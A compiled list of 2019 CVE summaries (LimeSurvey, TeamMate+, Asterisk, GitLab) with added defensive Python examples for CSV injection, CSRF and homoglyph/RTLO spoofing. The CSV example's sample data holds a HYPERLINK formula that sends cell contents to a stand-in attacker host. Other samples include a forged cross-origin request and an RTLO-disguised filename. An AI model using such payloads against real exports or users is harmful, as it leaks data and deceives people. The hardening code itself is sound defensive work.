CVE-2019-16175
A clickjacking vulnerability was found in Limesurvey before 3.17.14.
Source: CVE-2019-16175
CVE-2019-16180
Limesurvey before 3.17.14 allows remote attackers to brute-force the login form and enumerate valid usernames when the LDAP authentication method is used.
Source: CVE-2019-16180
CVE-2019-16185
In Limesurvey before 3.17.14, admin users can view, update, or delete reserved menu entries without proper permissions.
Source: CVE-2019-16185
CVE-2019-16181
In Limesurvey before 3.17.14, admin users can mark other users’ notifications as read.
Source: CVE-2019-16181
CVE-2019-16184
A CSV injection vulnerability was found in Limesurvey before 3.17.14 that allows survey participants to inject spreadsheet formulas via their survey responses; the formulas are written unescaped into the exported CSV file and are evaluated when an administrator opens it in a spreadsheet application.
Source: CVE-2019-16184
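The defensive check for this flaw class is independent of LimeSurvey: any cell whose first non-blank character is one of `=`, `+`, `-`, `@`, tab or carriage return is treated as a formula by Excel and LibreOffice, so an exporter must neutralize it. The following is an added example, not LimeSurvey code; the sample responses are constructed for illustration and the function names are this example's own.

```python
import csv
import io

# Leading characters that make Excel / LibreOffice evaluate a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return value so that a spreadsheet displays it as text instead of evaluating it.

    Leading whitespace is stripped before the check because spreadsheets ignore it
    when deciding whether a cell is a formula. A leading single quote forces text
    interpretation (the mitigation OWASP documents for CSV injection); the csv
    module still adds the surrounding double quotes when the cell contains a comma
    or a quote, so the result survives a round trip through csv.reader intact.
    """
    if not isinstance(value, str):
        return value
    if value.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_responses(rows, fieldnames, neutralize=True):
    """Serialize survey responses (list of dicts) to CSV text.

    neutralize=False reproduces the vulnerable behaviour: participant input is
    written into the file verbatim.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        cells = {k: row.get(k, "") for k in fieldnames}
        if neutralize:
            cells = {k: neutralize_cell(v) for k, v in cells.items()}
        writer.writerow(cells)
    return buf.getvalue()


def contains_formula_cells(csv_text):
    """Re-parse an exported CSV and list every cell a spreadsheet would evaluate.

    Useful as a post-export assertion or as a scanner for files already produced.
    """
    return [
        cell
        for row in csv.reader(io.StringIO(csv_text))
        for cell in row
        if cell.lstrip().startswith(FORMULA_TRIGGERS)
    ]


# Constructed sample: three of the four answers are formula-injection attempts.
FIELDS = ["id", "answer"]
SAMPLE_RESPONSES = [
    {"id": "1", "answer": "Very satisfied"},
    {"id": "2", "answer": '=HYPERLINK("http://attacker.example/?"&A1,"click")'},
    {"id": "3", "answer": "  -2+3"},
    {"id": "4", "answer": "@SUM(1+1)"},
]

if __name__ == "__main__":
    raw = export_responses(SAMPLE_RESPONSES, FIELDS, neutralize=False)
    print("vulnerable export, live formula cells:", contains_formula_cells(raw))
    safe = export_responses(SAMPLE_RESPONSES, FIELDS)
    print("hardened export, live formula cells:", contains_formula_cells(safe))
    print(safe)
```

The single-quote prefix also mangles legitimate negative numbers and phone numbers written with a leading `+`; an exporter that knows a column is numeric should emit it as a number rather than pass it through `neutralize_cell`.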
CVE-2019-16182
A reflected cross-site scripting (XSS) vulnerability was found in Limesurvey before 3.17.14 that allows remote attackers to inject arbitrary web script or HTML via extensions of uploaded files.
Source: CVE-2019-16182
CVE-2019-10253
A Cross-Site Request Forgery (CSRF) vulnerability exists in TeamMate+ 21.0.0.0 that allows a remote attacker to modify application data (upload malicious/forged files on a TeamMate server, or replace existing uploaded files with malicious/forged files). The specific flaw exists within the handling of Upload/DomainObjectDocumentUpload.ashx requests because of failure to validate a CSRF token before handling a POST request.
Source: CVE-2019-10253
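The root cause named above, a state-changing POST handler that never compares a submitted token against one bound to the session, is the same in any framework. The following added example (not TeamMate code; the handler, session and request shapes, and the allowed origin `https://teammate.example` are this example's own assumptions) shows the vulnerable handler beside a hardened one that applies the synchronizer-token pattern plus an Origin check as defense in depth.

```python
import hmac
import secrets

# Hypothetical: the origin the application is served from (assumption for the example).
ALLOWED_ORIGINS = {"https://teammate.example"}


def issue_csrf_token(session):
    """Generate a random token and bind it to the server-side session.

    The token is later embedded in the upload form; an attacker's page on
    another origin cannot read it, so a forged POST cannot include it.
    """
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def handle_upload_vulnerable(session, request):
    """Mirrors the flaw class: a POST that mutates state with no token check."""
    if request["method"] != "POST":
        return 405, "method not allowed"
    return 200, "stored " + request["form"]["filename"]


def handle_upload_hardened(session, request):
    """Same endpoint with CSRF protection applied before any state change."""
    if request["method"] != "POST":
        return 405, "method not allowed"

    # Defense in depth: browsers attach Origin to cross-site POSTs; reject foreign ones.
    origin = request.get("headers", {}).get("Origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return 403, "cross-origin request rejected"

    # Synchronizer token: constant-time compare against the session-bound value.
    expected = session.get("csrf_token")
    supplied = request["form"].get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"

    return 200, "stored " + request["form"]["filename"]


def forged_request():
    """Constructed: what a victim's browser sends when an attacker page auto-submits a form."""
    return {
        "method": "POST",
        "headers": {"Origin": "https://attacker.example"},
        "form": {"filename": "forged-report.docx"},
    }


def legitimate_request(token):
    """Constructed: the same upload submitted from the application's own form."""
    return {
        "method": "POST",
        "headers": {"Origin": "https://teammate.example"},
        "form": {"filename": "report.docx", "csrf_token": token},
    }


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    print("vulnerable, forged :", handle_upload_vulnerable(session, forged_request()))
    print("hardened,   forged :", handle_upload_hardened(session, forged_request()))
    print("hardened,   legit  :", handle_upload_hardened(session, legitimate_request(token)))
```

The session cookie still rides along with the forged request, which is why the token must live somewhere the attacker's origin cannot read (the session and the page body), not in a cookie alone; pairing this with `SameSite=Lax` on the session cookie blocks most of the same attacks at the browser.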
CVE-2019-15297
res_pjsip_t38 in Sangoma Asterisk 13.21-cert4, 15.7.3, and 16.5.0 allows an attacker to trigger a crash by sending a declined stream in a response to a T.38 re-invite initiated by Asterisk.
Source: CVE-2019-15297
CVE-2019-6795
An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It has Insufficient Visual Distinction of Homoglyphs Presented to a User. IDN homographs and RTLO (right-to-left override) characters are rendered as Unicode rather than being escaped or shown in punycode, which could be used for social engineering.
Source: CVE-2019-6795
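Two checks cover what the entry describes: flag bidirectional control characters and mixed-script labels before display, and render domains in their punycode (ASCII) form so a Cyrillic `а` cannot pass for a Latin one. The following is an added example, not GitLab code; the sample names are constructed and the function names are this example's own. Script detection here is approximated from Unicode character names, which is enough for Latin/Cyrillic/Greek confusables but not a full UTS #39 implementation.

```python
import unicodedata

# Bidirectional controls that reorder displayed text. U+202E (RLO) is the classic one:
# "invoice\u202Efdp.exe" is displayed as "invoiceexe.pdf".
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
    "\u200e", "\u200f",                                # LRM, RLM
}

# Scripts we distinguish by Unicode name prefix (approximation, see lead-in).
SCRIPT_PREFIXES = ("LATIN", "CYRILLIC", "GREEK", "ARMENIAN")


def script_of(ch):
    """Return the approximate script of a letter, or None for non-letters."""
    if not ch.isalpha():
        return None
    name = unicodedata.name(ch, "")
    for script in SCRIPT_PREFIXES:
        if name.startswith(script):
            return script
    return "OTHER"


def audit_display_name(text):
    """List the reasons a user-facing string could be visually deceptive."""
    findings = []
    for ch in text:
        if ch in BIDI_CONTROLS:
            findings.append(f"bidi control U+{ord(ch):04X}")
    scripts = {script_of(ch) for ch in text} - {None}
    if len(scripts) > 1:
        findings.append("mixed scripts: " + ", ".join(sorted(scripts)))
    # Fullwidth and other compatibility forms fold under NFKC; flag them too.
    if unicodedata.normalize("NFKC", text) != text:
        findings.append("not NFKC-normalized")
    return findings


def safe_render(text):
    """Escape bidi controls and non-ASCII letters so the raw code point is visible."""
    out = []
    for ch in text:
        if ch in BIDI_CONTROLS or (ch.isalpha() and ord(ch) > 127):
            out.append(f"\\u{ord(ch):04x}")
        else:
            out.append(ch)
    return "".join(out)


def to_punycode(domain):
    """Render a domain in its IDNA (xn--) form; pure ASCII names are unchanged."""
    return domain.encode("idna").decode("ascii")


# Constructed samples.
SAMPLE_NAMES = [
    "paypal.com",            # pure ASCII
    "p\u0430ypal.com",       # U+0430 CYRILLIC SMALL LETTER A in place of Latin a
    "invoice\u202Efdp.exe",  # RLO makes this display as invoiceexe.pdf
]

if __name__ == "__main__":
    for name in SAMPLE_NAMES:
        print(repr(name), "->", safe_render(name), audit_display_name(name))
    print(to_punycode(SAMPLE_NAMES[1]))
```

Rendering the escaped or punycode form is only needed where the string is an identifier a user will act on (a branch name, a file name, a link target); free-form prose in a non-Latin script legitimately mixes scripts with ASCII punctuation and would be flagged by a naive mixed-script rule, so apply the check to labels, not to whole documents.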
CVE-2019-6792
An issue was discovered in GitLab Community and Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. It allows Path Disclosure. When an error is encountered during project import, the error message displays instance-internal information such as filesystem paths.
Source: CVE-2019-6792